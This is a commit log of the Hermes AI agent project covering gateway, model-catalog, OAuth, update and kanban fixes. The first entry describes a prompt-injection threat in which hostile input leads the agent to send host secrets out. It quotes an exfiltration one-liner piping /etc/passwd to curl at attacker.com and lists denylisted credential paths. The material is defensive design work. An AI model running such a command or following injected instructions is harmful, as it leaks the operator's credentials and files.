Teknium	7a8589e782	fix(gateway): default media-delivery validation to denylist-only, restore .md delivery (#34022 ) PR #29523 restricted MEDIA: paths and bare local paths in agent output to files under the Hermes media cache or an operator-allowlisted root, with a 10-minute recency window as a fallback. The intent was to defend against prompt-injection-driven exfiltration of host secrets, but in the default single-user setup the asymmetry doesn't earn its keep: we accept any document type the user uploads inbound (.md, .pdf, .txt, .docx, ...) and the agent already has terminal access — anything that can convince it to emit a MEDIA: tag for /etc/passwd can equally convince it to `cat /etc/passwd \| curl attacker.com`. Practical breakage: agents that produced an .md, .pdf, or other artifact more than ~10 minutes ago, or outside the cache allowlist, showed the user a raw filepath in chat instead of the file. Default flipped to denylist-only: • /etc, /proc, /sys, /dev, /root, /boot, /var/{log,lib,run} • $HOME/{.ssh,.aws,.gnupg,.kube,.docker,.config,.azure,.gcloud} • macOS Library/Keychains • $HERMES_HOME/{.env, auth.json, credentials} The legacy allowlist+recency-window behavior stays available via opt-in: `gateway.strict: true` in config.yaml (or `HERMES_MEDIA_DELIVERY_STRICT=1`). Recommended for public-facing bots where prompt injection from one user shouldn't be able to exfiltrate the host's secrets to that same user. • `gateway/platforms/base.py` — `validate_media_delivery_path()` short-circuits to "return resolved if not under denylist" when strict is off. Strict mode preserves the original cache-then- allowlist-then-recency logic. New `_media_delivery_strict_mode()` reader for `HERMES_MEDIA_DELIVERY_STRICT`. • `hermes_cli/config.py` — `gateway.strict: false` added to DEFAULT_CONFIG; existing keys documented as "only consulted in strict mode." No `_config_version` bump needed (deep-merge picks up the new default for old installs). 
• `gateway/run.py` — bridges `gateway.strict` → `HERMES_MEDIA_DELIVERY_STRICT` at startup. • `tools/send_message_tool.py` — schema description broadened back to plain "any local path." • Tests — existing strict-path tests pinned to STRICT=1 so they keep exercising the legacy behavior; new `TestMediaDeliveryDefaultMode` with 8 cases covering the public default (stale .md accepted, any extension delivers, credential paths still blocked, strict env-var aliases, filter E2E). Validation: - tests/gateway/test_platform_base.py: 119/119 pass - tests/gateway/test_tts_media_routing.py: 7/7 pass - tests/tools/test_send_message_tool.py: 121/121 pass - tests/hermes_cli/test_kanban_notify.py: 12/12 pass - tests/cron/test_scheduler.py: 120/120 pass - E2E via execute_code with real imports: • stale .md outside allowlist → accepted (default) • same path with STRICT=1 → rejected • $HOME/.ssh/id_rsa → rejected (default) • filter_local_delivery_paths([md, key]) → [md] only • gateway.strict in config.yaml → bridged to env (true=1, false=0)	2026-05-28 11:32:36 -07:00
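The denylist-only default can be sketched as a path check against resolved roots. This is a simplified assumption of how `validate_media_delivery_path()` might behave with strict mode off: the helper names and signatures are hypothetical, and only the denylisted locations are taken from the commit message.

```python
from pathlib import Path
from typing import List, Optional


def build_denylist(home: Path, hermes_home: Path) -> List[Path]:
    """Resolved roots that must never be delivered, per the commit's list."""
    system = [Path(p) for p in (
        "/etc", "/proc", "/sys", "/dev", "/root", "/boot",
        "/var/log", "/var/lib", "/var/run",
    )]
    user = [home / name for name in (
        ".ssh", ".aws", ".gnupg", ".kube", ".docker", ".config", ".azure", ".gcloud",
    )]
    macos = [home / "Library" / "Keychains"]
    hermes = [hermes_home / name for name in (".env", "auth.json", "credentials")]
    # Resolve so symlinked roots (for example /var/run) compare correctly.
    return [path.resolve() for path in system + user + macos + hermes]


def validate_media_path(candidate: str, denylist: List[Path]) -> Optional[Path]:
    """Return the resolved path unless it is a denylisted entry or sits under one."""
    resolved = Path(candidate).expanduser().resolve()
    for blocked in denylist:
        if resolved == blocked or blocked in resolved.parents:
            return None
    return resolved
```

Resolving before comparing matters: a `../` hop or a symlink into `~/.ssh` should be rejected just like the direct path.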
Teknium	0c859a1c04	chore: release v0.15.0 (2026.5.28) (#34008 ) * chore: release v0.15.0 (2026.5.28) The Velocity Release. Run_agent.py refactor (16k→3.8k LOC, -76%), kanban grows into a multi-agent platform (104 PRs), cold-start perf wave continues (-240ms / -47% per-turn function calls / -195ms per tool call), session_search rebuilt (4500x faster, no LLM), promptware defense lands, Bitwarden Secrets Manager integration, two new image_gen providers (Krea 2, FAL plugin port), Nous-approved MCP catalog, OpenHands skill, ntfy as 23rd messaging platform, deep xAI integration round. 15 P0 + 65 P1 closures. 747 PRs, 1,302 commits, 321 contributors. * chore(release): bump acp_registry/agent.json to 0.15.0 (sync with pyproject)	2026-05-28 10:45:33 -07:00
kshitij	1a74795735	feat: add claude-opus-4.8 and claude-opus-4.8-fast (#34003 ) Anthropic released Claude Opus 4.8 on 2026-05-27, available on OpenRouter, Anthropic, Amazon Bedrock, and Claude Platform on AWS: - https://openrouter.ai/anthropic/claude-opus-4.8 - https://openrouter.ai/anthropic/claude-opus-4.8-fast The fast-mode variant is a separate model ID (anthropic/claude-opus-4.8-fast) priced at 2x of the base model — a notable improvement over the 6x premium on older Opus generations (4.6/4.7). It is NOT a `speed: "fast"` request parameter like Opus 4.6; Anthropic's native fast-mode beta still only covers Opus 4.6. Changes: hermes_cli/models.py - Add anthropic/claude-opus-4.8 + anthropic/claude-opus-4.8-fast to the OpenRouter fallback snapshot and the Nous Portal curated list (live catalogs surface them automatically when reachable; the fallback list matters when the manifest fetch fails). - Add claude-opus-4-8 to the Anthropic-native picker list. agent/model_metadata.py - Register claude-opus-4-8 / claude-opus-4.8 in DEFAULT_CONTEXT_LENGTHS with 1M tokens (matches 4.6/4.7). agent/anthropic_adapter.py - Extend _XHIGH_EFFORT_SUBSTRINGS, _ADAPTIVE_THINKING_SUBSTRINGS, and _NO_SAMPLING_PARAMS_SUBSTRINGS with "4-8"/"4.8". 4.8 inherits the Opus 4.7 API contract: adaptive thinking only, xhigh effort level supported, sampling parameters (temperature/top_p/top_k) return 400. - Add claude-opus-4-8 to _ANTHROPIC_OUTPUT_LIMITS (128k max output, same as 4.7). Matches by substring so claude-opus-4-8-fast and date-stamped variants resolve correctly. agent/usage_pricing.py - Add anthropic/claude-opus-4-8: $5/$25 per MTok input/output, $0.50 cache read, $6.25 cache write (same as 4.6/4.7). - Add anthropic/claude-opus-4-8-fast: $10/$50 per MTok (2x), $1.00 cache read, $12.50 cache write. Per OpenRouter, the 2x premium is the only differentiator from regular Opus 4.8. - OpenRouter routes still pull pricing from the live /models API, so no static OpenRouter entry is needed. 
tests/agent/test_model_metadata.py - Extend the Claude 4.6+ context-length tag list with 4.8/4-8. website/static/api/model-catalog.json - Regenerated via `python scripts/build_model_catalog.py` to pick up the new entries in the OpenRouter and Nous Portal fallback lists. E2E verification (isolated sys.path import against the worktree): - _supports_adaptive_thinking, _supports_xhigh_effort, _forbids_sampling_params all return True for claude-opus-4.8 and claude-opus-4.8-fast. - _supports_fast_mode (the `speed: "fast"` request-parameter gate) stays False for 4.8 — fast mode is a separate model ID on OpenRouter, not a parameter Anthropic accepts on the base model. - DEFAULT_CONTEXT_LENGTHS resolves 1M for both notations. - resolve_billing_route + _lookup_official_docs_pricing resolve the correct $5/$25 (regular) and $10/$50 (fast) pricing for both dot-notation and dash-notation inputs. - 4.7 and 4.6 regression: behavior unchanged. Unit tests: 305 passed across tests/agent/test_usage_pricing.py, test_model_metadata.py, tests/hermes_cli/test_model_catalog.py, test_models.py, test_model_validation.py, test_models_dev_preferred_merge.py.	2026-05-28 10:31:59 -07:00
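The substring-based capability check and the dot/dash pricing lookup can be illustrated as follows. The prices are the ones quoted in the commit message; the table layout, the helper names, and the two-entry substring tuple are hypothetical simplifications and do not reproduce the contents of `agent/usage_pricing.py` or `agent/anthropic_adapter.py`.

```python
from typing import Dict, Optional

# USD per million tokens, as stated in the commit message.
PRICING: Dict[str, Dict[str, float]] = {
    "anthropic/claude-opus-4-8": {
        "input": 5.0, "output": 25.0, "cache_read": 0.50, "cache_write": 6.25,
    },
    "anthropic/claude-opus-4-8-fast": {
        "input": 10.0, "output": 50.0, "cache_read": 1.00, "cache_write": 12.50,
    },
}

# Illustrative subset: only the tags this commit adds.
XHIGH_EFFORT_SUBSTRINGS = ("4-8", "4.8")


def supports_xhigh_effort(model: str) -> bool:
    """Substring match, so '-fast' and date-stamped variants also resolve."""
    return any(tag in model for tag in XHIGH_EFFORT_SUBSTRINGS)


def lookup_pricing(model: str) -> Optional[Dict[str, float]]:
    """Accept both dot notation (4.8) and dash notation (4-8)."""
    key = model.lower().replace(".", "-")
    if not key.startswith("anthropic/"):
        key = "anthropic/" + key
    return PRICING.get(key)


def estimate_cost(model: str, input_tokens: int, output_tokens: int) -> Optional[float]:
    price = lookup_pricing(model)
    if price is None:
        return None
    return (input_tokens * price["input"] + output_tokens * price["output"]) / 1_000_000
```

One million input tokens plus one million output tokens on the base model comes to $5 + $25 = $30, and exactly twice that on the fast variant.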
kshitij	a82c88bac0	fix(xai-oauth): accept bare-code manual paste (state=None) (#26923 ) (#33880 ) xAI's consent page renders the authorization code in-page rather than redirecting through the 127.0.0.1 callback, so on remote/headless setups (GCP Cloud Shell, Codespaces, container consoles, headless VPS) the only value the user can paste is the opaque code with no `code=`/`state=` query parameters. `_parse_pasted_callback` correctly returns `state=None` for that input, but `_xai_oauth_loopback_login` then validated state unconditionally and raised `xai_state_mismatch`, making the documented bare-code paste path unreachable. PKCE (code_verifier) still binds the token exchange to this client, so the local state-equality check is redundant when there is no state to compare. On the manual-paste path only, substitute the locally generated state when the callback returned none — the rest of the validation chain (code presence, error field, token exchange) is unchanged. The loopback HTTP-server path still requires a matching state (a real browser redirect always carries one). Also: clarify the manual-paste prompt to mention xAI's in-page code rendering so users know pasting the bare code on its own is expected. Root-cause analysis from #26923 comment by @AccursedGalaxy (2026-05-20). Tests ----- * test_xai_loopback_login_manual_paste_bare_code_succeeds — positive end-to-end through the token exchange with state=None. * test_xai_loopback_login_loopback_path_rejects_missing_state — the HTTP-server path still rejects state=None as a regression guard (the bare-code relaxation must NOT widen the loopback path). * Existing test_xai_loopback_login_manual_paste_state_mismatch_raises continues to verify wrong (non-None) state is rejected on manual-paste. Closes #26923.	2026-05-28 05:47:30 -07:00
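The relaxed state check can be expressed as a small decision function. This is a sketch under assumptions: `resolve_callback_state`, the exception class, and the `manual_paste` flag are hypothetical names; the rule itself (substitute the local state only on the manual-paste path, keep rejecting a missing or wrong state elsewhere) follows the commit message.

```python
import hmac
from typing import Optional


class OAuthStateMismatch(Exception):
    """Raised when the callback state does not match the one we generated."""


def resolve_callback_state(
    expected_state: str,
    returned_state: Optional[str],
    manual_paste: bool,
) -> str:
    if returned_state is None:
        if manual_paste:
            # A bare code carries no state; PKCE still binds the token
            # exchange to this client, so use the locally generated state.
            return expected_state
        # A real browser redirect always carries a state.
        raise OAuthStateMismatch("xai_state_mismatch")
    if not hmac.compare_digest(returned_state, expected_state):
        raise OAuthStateMismatch("xai_state_mismatch")
    return returned_state
```

The relaxation is deliberately narrow: a wrong, non-empty state is still rejected on both paths.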
Teknium	e0572a6def	fix(skills-hub): stop ellipsis-truncating the Identifier column (#33810 ) `hermes skills search` rendered the Identifier column with the default overflow behaviour, so long slugs (notably browse-sh — every browse-sh skill ends in a `-XXXXXX` hash that's part of the identifier) were cut to `browse-sh/weathe…`. Users copied the visible string into `hermes skills install` and got a not-found error because the hash was gone. Set overflow="fold" on the Identifier column in both search tables (`do_search` and the `_resolve_short_name` multi-match table) so long slugs wrap onto a second line instead of getting eaten. Also add a `--json` flag to `hermes skills search` (and the `/skills search` slash variant) for scripting — emits a list of {name, identifier, source, trust_level, description} objects with the full identifier, which is the right shape for copy-paste pipelines too. Closes #33674.	2026-05-28 04:53:13 -07:00
Teknium	5e1f793430	chore(web): remove web_crawl tool + provider crawl plumbing (#33824 ) The web_crawl_tool() function was an orphan — no model schema registered it, no skill or CLI command called it, and the agent had no way to invoke it. PR #32608 proposed wiring it up as a model-callable tool; we've decided not to expose crawl as a separate capability since web_search + web_extract cover the use cases we want models to have. Removed: - tools/web_tools.py: web_crawl_tool() (~230 LOC) - plugins/web/firecrawl/provider.py: supports_crawl() + crawl() - plugins/web/tavily/provider.py: supports_crawl() + crawl() - plugins/web/xai/provider.py: supports_crawl() override - agent/web_search_provider.py: supports_crawl() + crawl() ABC methods - agent/web_search_registry.py: get_active_crawl_provider() + the 'crawl' branch in _resolve() - agent/display.py: web_crawl tool-progress rendering - hermes_cli/config.py: 'web_crawl' from TAVILY_API_KEY.tools - tools/website_policy.py: stale comment reference - Tests: removed TestWebCrawlTavily class, the two website-policy web_crawl tests, the searxng/ddgs/brave-free crawl-error tests, the integration test_web_crawl method, and the test_unconfigured_crawl_emits_top_level_error test. Trimmed the capability-flag parametrize list and the WebSearchProvider ABC conformance tests. - Docs: trimmed the Crawl column from capability tables in both EN and zh-Hans, updated the developer-guide ABC table. Net: 25 files, +115/-1067. Closes #33762 (the schema-text bug only existed if #32608 landed). Supersedes #32608.	2026-05-28 04:52:42 -07:00
teknium1	6f9182cb34	fix(kanban): content-addressed corrupt-DB backup filename Repeated quarantines of an unchanged corrupt kanban.db used to amplify disk usage by N: the gateway dispatcher's 5-minute retry loop, multi- profile fleets sharing one DB, and manual reopen attempts each produced a fresh '.corrupt.<timestamp>.bak' copy of the same bytes. After 10 retries on a 100KB DB you had 11x the disk footprint of duplicate corrupt data. Derive the backup filename from a sha256 of the main DB instead of a timestamp + collision counter. Same bytes → same filename → skip the copy on retries. Different bytes (partial repair, further damage) → different filename → preserve separately. Sidecar (-wal/-shm) backups inherit the same content-addressed name. Inspired by @hanzckernel's PR #33529, simplified down to ~30 LOC: drop the persistent JSON marker file, drop the atomic temp+fsync+rename helper (shutil.copy2 is fine for a quarantine-only path), drop the gateway-side WAL/SHM fingerprint extension (the existing (path, mtime, size) tuple still gives the 5-minute retry semantics it needs), and drop the gateway-side helper extraction. The backup file existing IS the marker; no separate state needed. Test: tests/hermes_cli/test_kanban_db.py::test_repeated_corrupt_open_reuses_single_backup proves 10 retries on the same corrupt bytes produce 1 backup (was 11), and mutating the corrupt bytes produces a second backup with a different fingerprint. Refs #33529 Co-authored-by: hanzckernel <zhicheng.han@mathematik.uni-goettingen.de>	2026-05-28 03:38:09 -07:00
Teknium	432a691758	fix(update): stream + idle-kill `npm run build` so a stalled webui-build can't soft-brick the install (#33803 ) `hermes update` ran the webui build with `capture_output=True` and no timeout. On low-memory hosts (WSL2's 4 GB default, small VPSes, antivirus stalls) Vite goes silent for minutes; users see a frozen terminal, decide the update is hung, and reboot. The reboot lands after `pip install -e .` has already touched the install but before the build completes, leaving the `hermes` launcher in place while `hermes_cli` is no longer importable — i.e. `ModuleNotFoundError: No module named 'hermes_cli'` (#33788, same class as #32384). Changes: - New `_run_with_idle_timeout()` helper: streams subprocess output line-by-line (so the user sees Vite progress in real time) and kills the process if no bytes appear on stdout/stderr for 180s. The existing stale-dist fallback (#23817) then serves the previous build instead of failing the update. - `_build_web_ui()` uses the helper for `npm run build` (the actual stall site). `npm install` keeps `subprocess.run` + capture_output to preserve the existing EPERM-retry-on-Windows contract. - Both `cmd_update` call sites print `→ Core update complete. Building dashboard (optional)...` before the webui build. The CLI is fully functional at this point; a webui-build failure only affects `hermes dashboard`. Telegraphing the boundary explicitly stops users from rebooting through the build step. Tests: - `tests/hermes_cli/test_run_with_idle_timeout.py` — 4 tests covering streaming success, nonzero exit, idle-kill, and missing-binary cases. Uses real `subprocess.Popen` on tiny Python scripts; isolated in its own file so per-file canonical-runner parallelism doesn't pair it with the mock-heavy tests. - `tests/hermes_cli/test_web_ui_build.py` — updated existing tests to patch `_run_with_idle_timeout` for the build step in addition to `subprocess.run` for the install step. 
- `tests/hermes_cli/test_cmd_update.py::test_update_refreshes_repo_and_tui_node_dependencies` — same update. Full suite: `scripts/run_tests.sh tests/hermes_cli/` → 5646 passed, 0 failed. Fixes #33788.	2026-05-28 03:34:47 -07:00
Teknium	10ee4a729b	fix(gateway): drain on Windows `hermes gateway stop` so sessions survive restart (#33798 ) Sessions now survive `hermes gateway stop` / `restart` on native Windows. Previously the gateway died on schtasks `/End` + os.kill SIGTERM without ever running the drain loop, so the v0.13.0 session-resume feature (#21192) silently broke on Windows: `resume_pending=True` was never written, and the next boot started with a blank conversation history (issue #33778). Root cause is twofold and the reporter only identified half of it: 1. `hermes_cli/gateway_windows.py::stop()` did not write the `planned_stop_marker` before signalling. The reporter caught this. 2. The bigger reason: `asyncio.add_signal_handler` raises NotImplementedError for SIGTERM/SIGINT on Windows, so even if the marker had been written, the gateway's existing SIGTERM handler (which is what calls `runner.stop()` and the `mark_resume_pending` loop) was never invoked. Writing the marker would have been necessary-but-insufficient. The fix has two parts: * gateway/run.py: new `_run_planned_stop_watcher` daemon thread polls for the planned-stop marker file every 0.5s. When the marker appears it `loop.call_soon_threadsafe(shutdown_signal_handler, None)` — the same shutdown path a real SIGTERM would have driven, including the pre-drain `mark_resume_pending` writes (run.py:5977) and graceful drain wait. The existing signal handler already accepts `received_signal=None` and falls through to `consume_planned_stop_marker_for_self()`, so no handler changes needed. Runs on every platform as cheap belt-and-suspenders. * hermes_cli/gateway_windows.py: `stop()` now writes the marker for the running gateway PID and waits up to `agent.restart_drain_timeout` (default 30s) for the PID to exit cleanly. On clean drain, the kill sweep is non-forceful; on timeout, escalates to `kill_gateway_processes(force=True)` which routes to taskkill /T /F per `references/windows-native-support.md`. 
Validation: * 7 new tests in tests/gateway/test_planned_stop_watcher.py covering: marker→handler dispatch, no-marker idle, already-draining skip, not-yet-running skip, stop_event responsiveness, fire-once semantics, error tolerance. * 8 new tests in tests/hermes_cli/test_gateway_windows.py covering: marker-before-kill ordering, clean-drain skips force-kill, drain-timeout escalates to force=True, no-pid-skips-drain, invalid-pid handling, fast-exit success, timeout failure, marker-write-failure tolerance. * E2E (Linux, detached orphan): write_planned_stop_marker(pid) + `_drain_gateway_pid(pid, 5.0)` returns True in 0.5s after the victim sees the marker and exits. Tested with a double-forked subprocess so the test parent isn't holding it as a zombie. * Targeted: tests/gateway/{restart_drain,restart_resume_pending, signal,signal_format,status,shutdown_forensics,approve_deny_commands, planned_stop_watcher} + tests/hermes_cli/{gateway_windows, gateway_service} → 519/519. What was wrong with the reporter's claim (for future archaeology): they described the symptom as "no `resume_pending=True` written to `sessions.json`" — but Hermes uses `state.db` (SQLite), not `sessions.json`, and `mark_resume_pending` is called regardless of the marker (the marker only affects exit code 0 vs 1 for systemd revival semantics). The real session-loss path is the missing drain on Windows, not a missing marker. Both halves are fixed here. Closes #33778.	2026-05-28 03:25:32 -07:00
Aditya Rajesh Gadgil	031983bbf8	fix: limit pre-update state snapshots	2026-05-28 02:45:25 -07:00
sprmn24	4ed482549f	fix(xai-proxy): handle 429 rate-limit responses in proxy retry path get_retry_credential only triggered on 401; a 429 Too Many Requests from xAI was silently streamed back with no key rotation or back-off signal. - server.py: widen retry gate from == 401 to in {401, 429} - xai.py: on 429, skip token refresh and call mark_exhausted_and_rotate to stamp the 1-hour cooldown on the rate-limited key and return the next available credential. Returns None if pool is exhausted.	2026-05-28 02:36:37 -07:00
Dusk1e	aa3466063b	fix(android): reject unsafe tar members in psutil compatibility installer	2026-05-28 02:36:09 -07:00
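
The log entry for aa3466063b does not say how unsafe tar members are detected. As a minimal sketch of the general technique only, assuming "unsafe" means absolute paths, `..` components, links, and device nodes, a pre-extraction check could look like the following. `find_unsafe_members` and `build_demo_archive` are hypothetical names for illustration, not functions from the Hermes installer.

```python
import io
import tarfile
from pathlib import PurePosixPath
from typing import List


def find_unsafe_members(archive: tarfile.TarFile) -> List[str]:
    """Return names of members that could write outside the extraction root.

    Assumed policy (not taken from the commit): reject absolute paths,
    any '..' path component, symlinks, hard links, and device nodes.
    """
    unsafe = []
    for member in archive.getmembers():
        path = PurePosixPath(member.name)
        escapes_root = path.is_absolute() or ".." in path.parts
        # Links and device nodes can redirect later writes, so flag them too.
        special = member.issym() or member.islnk() or member.isdev()
        if escapes_root or special:
            unsafe.append(member.name)
    return unsafe


def build_demo_archive(names: List[str]) -> bytes:
    """Build an in-memory tar with one small regular file per name (demo only)."""
    buffer = io.BytesIO()
    with tarfile.open(fileobj=buffer, mode="w") as archive:
        for name in names:
            payload = b"demo"
            info = tarfile.TarInfo(name=name)
            info.size = len(payload)
            archive.addfile(info, io.BytesIO(payload))
    return buffer.getvalue()


if __name__ == "__main__":
    data = build_demo_archive(["pkg/module.py", "../evil.py", "/abs/file"])
    with tarfile.open(fileobj=io.BytesIO(data), mode="r") as archive:
        bad = find_unsafe_members(archive)
    if bad:
        print("refusing to extract; unsafe members:", bad)
```

Checking every member before extracting anything means a single bad entry rejects the whole archive instead of leaving a half-extracted tree behind.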

2349 commits
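
Commit 6f9182cb34 above describes deriving the corrupt-DB backup filename from a sha256 of the main DB so that retries on unchanged bytes reuse a single backup. A minimal sketch of that idea follows, assuming a `.corrupt.<digest>.bak` suffix and a 16-character digest prefix. Both are illustrative guesses, and `quarantine_corrupt_db` is a hypothetical name, not the function in `hermes_cli`.

```python
import hashlib
import shutil
import tempfile
from pathlib import Path


def quarantine_corrupt_db(db_path: Path) -> Path:
    """Copy a corrupt DB to a content-addressed backup, once per distinct content.

    Same bytes give the same filename, so the copy is skipped on retries.
    Different bytes give a different filename and are preserved separately.
    """
    digest = hashlib.sha256(db_path.read_bytes()).hexdigest()[:16]  # assumed length
    backup = db_path.with_name(f"{db_path.name}.corrupt.{digest}.bak")  # assumed format
    if not backup.exists():
        # The backup file existing is the marker; no separate state is kept.
        shutil.copy2(db_path, backup)
    return backup


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        db = Path(tmp) / "kanban.db"
        db.write_bytes(b"not a sqlite file")
        for _ in range(10):
            quarantine_corrupt_db(db)
        print(len(list(Path(tmp).glob("*.bak"))), "backup(s) after 10 retries")
```

Reading the whole file to hash it is acceptable for a quarantine-only path on small databases; a chunked read would be the usual change for large files.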